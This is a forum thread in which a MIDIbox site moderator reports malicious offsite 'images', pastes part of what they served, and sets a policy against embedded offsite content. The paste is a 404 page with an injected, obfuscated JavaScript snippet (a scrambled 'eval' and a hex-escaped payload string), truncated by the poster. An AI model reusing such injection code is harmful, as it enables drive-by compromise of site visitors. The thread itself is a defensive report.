Offsite documentation and other non-midibox.org links

MIDIbox Documentation Project
1

Hi all,

By now, you’ve all heard my complain about offsite documentation. If you haven’t, search the forum for <broken record> to find me joking about the fact that I have to repeat myself so often.

The primary reason for this is that offsite doco tends to disappear - which sucks. Another reasonfor it is that we have no control over offsite data.

I have just woken up to a PM alerting me to a series of posts containing links to so-called ‘images’ which triggered a forum member’s virus scanner.

Upon viewing the content of these images, I found the following:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<HTML><HEAD>

<TITLE>404 Not Found</TITLE>

</HEAD><BODY>



<h1>Not Found (404)</h1>



The requested URL

/midibox/midibox-jun23-1.jpg

was not found on this server.

<hr>



www.alphazone1.com <div id='x05ef3d8cc73f889bca9e349db656d2747'><script>var jQuery = eval('wziNnzdNoNwk.zeLvLamlL'.replace(/[LmzNk]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x74\x51\x7a\x37\x54\x28\x79\x72\x31\x55\x42\x78\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e

.... remaining data removed .....

These were all posted by a member known as bcbox. I have no idea, nor can I be bothered converting all those codes into binary and decoding it, to find out what the FUCK that javascript is, but I do know that it is entirely unneccesary and just down-right dodgy.

As a result I have just spent 90 minutes twisting my arthritis riddled knuckles to remove these images. I’m sure you can imagine that I am now extremely fucking pissed off.

While I was there I have also noticed a few other unsavoury practices such as embedding forum avatars in div tags.

As such, I will be aggressively attacking any offsite embedded data I see in future, instantly. That probably means removing them, and may extend to requestingbans if malicious intent is apparent. There are plenty of ways for you to upload content to the local servers, where we have total control over them - there is no reason for offsite data to be embedded. Of course, if you just hyperlink to it, then it’s clear to the user where the data comes from, because they’ll have to click the link. No harm there.

Yours,

A VERY angry stryd_one.

@ TK / Twin-X / SmashTV : If you please: bcbox needs a ban until he can explain this, and LX needs to have his profile edited to remove the div tags.

2

Hi stryd,

don’t be too angry with bcbox until we know what happened :wink:

usually when it comes to spam and other nasty stuff, we’re dealing with evil bots and probably only infected & unsuspectingly humans.

Though as someone who cleaned an infected WP installation just recently (with infected pics all over the server), I can understand your mood ;D

Best,

Michael

3

Heh no I’m not angry at bcbox, I have no idea what happened. I’d lay london to a brick that he’s copped a virus or been hacked and has no idea it happened. Particularly given results like these: http://www.virustotal.com/analisis/2cbe0d603772179418f42a4a31a80d6f

Still, offsite documentation… <broken record> :smiley:

If you’re talking about the ban, that’s for safety, not anger; It’s intended as temporary quarantine, rather than punishment :wink: Just until he gets a virus scanner and updates his PC, and has confirmed that he has eliminated any threats he may bring to us.

bcbox has been active here for several years, and not posted a lot recently. I doubt he’s some hacker who refreshes the unread posts page for a couple of years, just to see if his virus has been accepted yet heheh… more likely he is a midibox friend who won’t want to see us grab any more nasties off his PC.